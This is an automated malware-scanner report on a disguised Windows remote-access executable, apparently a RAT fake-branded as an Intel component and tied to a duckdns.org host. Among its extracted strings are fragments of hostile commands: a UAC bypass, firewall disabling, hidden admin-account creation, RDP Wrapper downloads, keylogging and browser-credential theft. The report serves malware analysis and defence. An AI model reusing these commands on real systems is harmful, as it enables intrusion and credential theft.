PREMIUM PESCAN.IO - Analysis Report

File Structure
Analysis Image
PE Chart Code
Header PE (light blue)
Executable sections (pink)
Non-executable sections (black)
External injected code (red)
File Structure in red = malformed or corrupted header
Chart Code For Other Files
Printable characters (blue)
Non-printable characters (black)
Information
Size: 292,00 KB
SHA-256 Hash: 706BD2E1AAC21FADFBCFE1E6639A6488C574F00B007E087718282C597BEBF1C1
SHA-1 Hash: C401C3621C53FD64594E989A77BA055859B3D87C
MD5 Hash: 2AC18DCB91824B1838EF83DA2E2E8C14
Imphash: F34D5F2D4577ED6D9CEEC516C1F5A744
MajorOSVersion: 4
MinorOSVersion: 0
CheckSum: 00000000
EntryPoint (rva): 4A2CE
SizeOfHeaders: 200
SizeOfImage: 50000
ImageBase: 400000
Architecture: x86
ImportTable: 4A274
IAT: 2000
Characteristics: 102
TimeDateStamp: 69DD13DA
Date: 13/04/2026 16:03:38
File Type: EXE
Number Of Sections: 3
ASLR: Enabled
Section Names: .text, .rsrc, .reloc
Number Of Executable Sections: 1
Subsystem: Windows GUI
UAC Execution Level Manifest: asInvoker
Sections Info
Section Name Flags ROffset RSize VOffset VSizeEntropyChi2
.text
0x60000020
Code
Executable
Readable
 200 48400 2000 482D4
5.1961
11592617.84
.rsrc
0x40000040
Initialized Data
Readable
 48600 800 4C000 688
3.6449
145753.25
.reloc
0x42000040
Initialized Data
GP-Relative
Readable
 48E00 200 4E000 C
0.1019
128015
Description
OriginalFilename: Cliente_lachencha5045_duckdns_org_5045.exe
CompanyName: Intel Corporation
LegalCopyright: Copyright Intel Corporation 2026
ProductName: System Runtime
FileVersion: 8.4.4512.0
FileDescription: System Runtime
ProductVersion: 8.4.4512.0
Comments: System component
Language: Unknown (ID=0x0)
CodePage: Unicode (UTF-16 LE) (0x4B0)
Entry Point
The section number (1) - (.text) have the Entry Point
Information -> EntryPoint (calculated) - 484CE
Code -> FF25002040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Assembler
|JMP DWORD PTR [0X402000]
|ADD BYTE PTR [EAX], AL
|ADD BYTE PTR [EAX], AL
|ADD BYTE PTR [EAX], AL
|ADD BYTE PTR [EAX], AL
|ADD BYTE PTR [EAX], AL
|ADD BYTE PTR [EAX], AL
|ADD BYTE PTR [EAX], AL
|ADD BYTE PTR [EAX], AL
|ADD BYTE PTR [EAX], AL
|ADD BYTE PTR [EAX], AL
|ADD BYTE PTR [EAX], AL
|ADD BYTE PTR [EAX], AL
|ADD BYTE PTR [EAX], AL
|ADD BYTE PTR [EAX], AL
|ADD BYTE PTR [EAX], AL
|ADD BYTE PTR [EAX], AL
|ADD BYTE PTR [EAX], AL
|ADD BYTE PTR [EAX], AL
|ADD BYTE PTR [EAX], AL
|ADD BYTE PTR [EAX], AL
|ADD BYTE PTR [EAX], AL
|ADD BYTE PTR [EAX], AL
Signatures
Certificate - Digital Signature Not Found:
• The file is not signed
Packer/Compiler
Compiler: Microsoft Visual .NET - (You can use a decompiler for this...)
AnyCPU: True
Version: v4.0
Detect It Easy (die)
PE: Protector: Eziriz .NET Reactor(6.x.x.x)[By Dr.FarFar]
PE: library: .NET(v4.0.30319)[-]
PE: linker: Microsoft Linker(11.0)[-]
Entropy: 5.18
Suspicious Functions
Library Function Description
KERNEL32.DLL LoadLibraryW | Possible Call API By Name Loads the specified module into the address space of the calling process.
KERNEL32.DLL GetModuleHandle | Possible Call API By Name Retrieves a handle to the specified module.
KERNEL32.DLL GetProcAddress | Possible Call API By Name Retrieves the address of an exported function or variable from the specified dynamic-link library (DLL).
KERNEL32.DLL GetModuleHandle Retrieves a handle to the specified module.
KERNEL32.DLL CreateRemoteThread Creates a thread in the address space of another process.
KERNEL32.DLL WriteProcessMemory Writes data to an area of memory in a specified process.
KERNEL32.DLL GetProcAddress Retrieves the address of an exported function or variable from the specified dynamic-link library (DLL).
USER32.DLL GetAsyncKeyState Retrieves the status of a virtual key asynchronously.
ADVAPI32.DLL CryptDecrypt Performs a cryptographic operation on data in a data block.
Windows REG (UNICODE)
Software\Classes\ms-settings\Shell\Open\commandDelegateExecute Software\Classes\ms-settingsYSHELL|OUT|Bypass UAC (fodhelper) ejecutado. SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f 2>nul SOFTWARE\Microsoft\Windows\CurrentVersion\Run Software\Classes\mscfile\Shell\Open\command Software\Classes\mscfile SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /vSoftware\Brave-Browser\User DataOpera Software\Opera Stable Software\Opera GX Stable Software\Google\Chrome\BLBeacon SOFTWARE\Microsoft\Windows NT\CurrentVersion
Rebuilt string - SOFTWARE\Microsoft\Windows\CurrentVersion\Run
File Access
Cliente_lachencha5045_duckdns_org_5045.exe
mscoree.dll
advapi32.dll
ncrypt.dll
bcrypt.dll
winmm.dll
gdi32.dll
ntdll.dll
kernel32.dll
user32.dll
Temp
File Access (UNICODE)
kernel32.dll
user32.dll
RDPWInst.exe
Cliente_lachencha5045_duckdns_org_5045.exe
robocopy.exe
msedge.exe
firefox.exe
chrome.exe
explorer.exe
DEBUG] csc.exe
csc.exe
mshta.exe
rundll32.exe
msiexec.exe
%/f /im svchost.exe
taskkill.exe
)computerdefaults.exe
powershell.exe
schtasks.exe
cmstp.exe
fodhelper.exe
cmd.exe
wscript.exe
wchelper.exe
kernel32.dll
hook.dll
rdpwrap.ini
$rdpDir\rdpwrap.ini
ini/master/rdpwrap.ini
2.zip
9-GH.zip
TEMP\rdpwrap.zip
wch.zip
Temp
AppData
SQL Queries
SELECT * FROM Win32_Processor
SELECT * FROM Win32_VideoController
SELECT TotalVisibleMemorySize FROM Win32_OperatingSystem
SELECT ProcessorId FROM Win32_Processor
SELECT SerialNumber FROM Win32_DiskDrive
SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Camera' OR PNPClass = 'Image')S"cam":"
SELECT displayName FROM AntiVirusProduct
Interest's Words
lockbit
Virus
Encrypt
Decrypt
KeyLogger
PassWord
<main
exec
attrib
start
pause
cipher
hostname
systeminfo
ping
replace
Interest's Words (UNICODE)
Virus
taskkill
Encrypt
PassWord
wscript
mshta
exec
powershell
schtasks
netsh
taskkill
start
pause
wmic
robocopy
rundll32
cacls
icacls
netstat
schtask
xcopy
netcfg
ping
rundll
expand
route
sc.exe
URLs (UNICODE)
http://api.ipify.org' -UseBasicParsing -TimeoutSec 5).Content.Trim()}catch{}if(-not $wanIP){try{$wanIP=(Invoke-WebRequest -Uri '
http://ip-api.com/json/?fields=country,cityDesconocida
https://github.com/stascorp/rdpwrap/releases/download/v1.6.2/RDPWrap-v1.6.2.zip' -OutFile $zipFile -UseBasicParsing}catch{L "Error descargando: $_"} }
AV Services (UNICODE)
securitycenter2.exe - (SecurityCenter2)
IP Addresses
127.0.0.1
Strings/Hex Code Found With The File Rules
Rule Type Encoding Matched (Word)
Text Ascii File (GetTempPath)
Text Ascii Encryption (FromBase64String)
Text Ascii Encryption (ToBase64String)
Text Ascii Encryption API (CryptDecrypt)
Text Ascii Anti-Analysis VM (GetVersion)
Text Ascii Stealth (CloseHandle)
Text Ascii Stealth (VirtualAlloc)
Text Unicode Stealth (VirtualProtect)
Text Ascii Stealth (CreateRemoteThread)
Text Ascii Execution (CreateProcessW)
Text Unicode Execution (CreateProcessW)
Text Ascii Execution (ShellExecute)
Text Ascii Execution (ResumeThread)
Text Unicode Privileges (SeDebugPrivilege)
Text Unicode Keyboard Key ([Enter])
Text Unicode Keyboard Key ([Tab])
Text Unicode Keyboard Key (Scroll)
Text Ascii Malicious code executed after exploiting a vulnerability (Payload)
Text Unicode Signal sent from infected system to a command and control server (Beacon)
Text Ascii Software that records keystrokes to steal credentials (Keylogger)
Text Unicode Malware that monitors and collects user data (Spy)
Text Ascii Technique used to insert malicious code into legitimate processes (Inject)
Text Ascii Malicious rerouting of traffic to an attacker-controlled site (Redirect)
Text Unicode Technique used to circumvent security measures (Bypass)
Entry Point Hex Pattern Microsoft Visual C / Basic .NET
Entry Point Hex Pattern Microsoft Visual C++ 8
Entry Point Hex Pattern Microsoft Visual C++ 8.0
Entry Point Hex Pattern Microsoft Visual C v7.0 / Basic .NET
Entry Point Hex Pattern Microsoft Visual Studio .NET
Entry Point Hex Pattern .NET executable
Resources
Path DataRVA Size FileOffset CodeText
\VERSION\1\0 4C0A0 3F8 486A0 F80334000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE000001000400..4...V.S._.V.E.R.S.I.O.N._.I.N.F.O...............
\24\1\0 4C498 1EA 48A98 EFBBBF3C3F786D6C2076657273696F6E3D22312E302220656E636F64696E673D225554462D3822207374616E64616C6F6E65...<?xml version="1.0" encoding="UTF-8" standalone
Intelligent String
• Cliente_lachencha5045_duckdns_org_5045.exe
• wch.zip
• wchelper.exe
• .vbs
• wscript.exe
• 3lachencha5045.duckdns.org
• .tmp
• cmd.exe
• fodhelper.exe
• .bat
• reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f 2>nul
• .inf
• CommandLine=cmd /c "
• cmstp.exe
• schtasks.exe
• 9" /sc onlogon /rl highest /f
• ;/delete /tn "SystemUpdate" /f
• powershell.exe
• runas
• )computerdefaults.exe
• <?xml version="1.0"?><Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"><RegistrationInfo<Principals><Principal><RunLevel>HighestAvailable</RunLevel></Principal></Principals><Settings><MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy><DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries></Settings><Actions><Exec><Command>
• .xml
• ;/delete /tn "WinUpdateSvc" /f
• eventvwr.msc
• taskkill.exe
• %/f /im svchost.exe
• .jpg
• .exe
• .com
• .scr
• .cmd
• .vbe
• .jse
• .wsf
• .ps1
• .msi
• .dll
• .hta
• msiexec.exe
• rundll32.exe
• mshta.exe
• hook.dll
• Microsoft.NET
• csc.exe
• e[DEBUG] csc.exe not found, anti-detect DLL skipped
• kernel32.dll
• explorer.exe
• chrome.exe
• firefox.exe
• msedge.exe
• robocopy.exe
• Login Data
• %Login Data-journal
• .log
• net user
• 1 /ADD /Y 2>&1 | Out-Null
• + /ADD 2>&1 | Out-Null
• M:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList' -Force | Out-Null
• M:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList' -Name '
• M:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name 'fDenyTSConnections' -Value 0 -Type DWord
• M:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name 'fSingleSessionPerUser' -Value 0 -Type DWord
• M:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name 'UserAuthentication' -Value 0 -Type DWord
• M:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name 'SecurityLayer' -Value 0 -Type DWord
• Wnetsh advfirewall set allprofiles state off
• netsh advfirewall firewall add rule name='HRDP' dir=in action=allow protocol=TCP localport=3389 profile=any 2>&1 | Out-Null
• C:\Program Files\RDP Wrapper'
• 5 Invoke-WebRequest -Uri 'https://github.com/sebaxakerhtc/rdpwrap/releases/download/v1.8.9.9/RDPWrap-v1.8.9.9-GH.zip' -OutFile $zipFile -UseBasicParsing
• i try{Invoke-WebRequest -Uri 'https://github.com/stascorp/rdpwrap/releases/download/v1.6.2/RDPWrap-v1.6.2.zip' -OutFile $zipFile -UseBasicParsing}catch{L "Error descargando: $_"}
• try{Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/sebaxakerhtc/rdpwrap.ini/master/rdpwrap.ini' -OutFile "$rdpDir\rdpwrap.ini" -UseBasicParsing;L 'rdpwrap.ini actualizado'}catch{}
• S }else{L 'RDPWInst.exe no encontrado'}
• try{$wanIP=(Invoke-WebRequest -Uri 'http://api.ipify.org' -UseBasicParsing -TimeoutSec 5).Content.Trim()}catch{}
• if(-not $wanIP){try{$wanIP=(Invoke-WebRequest -Uri 'http://ifconfig.me/ip' -UseBasicParsing -TimeoutSec 5).Content.Trim()}catch{}}
• .wan
• ) "cmd /c exit" 2>nul
• logins
• http://ip-api.com/json/?fields=country,city
• _CorExeMainmscoree.dll
Flow Anomalies
Offset RVA Section Description
484CE 402000 .text JMP [static] | Indirect jump to absolute memory address
Extra Analysis
Metric Value Percentage
Ascii Code 159122 53,2166%
Null Byte Code 117645 39,3451%
© 2026 All rights reserved.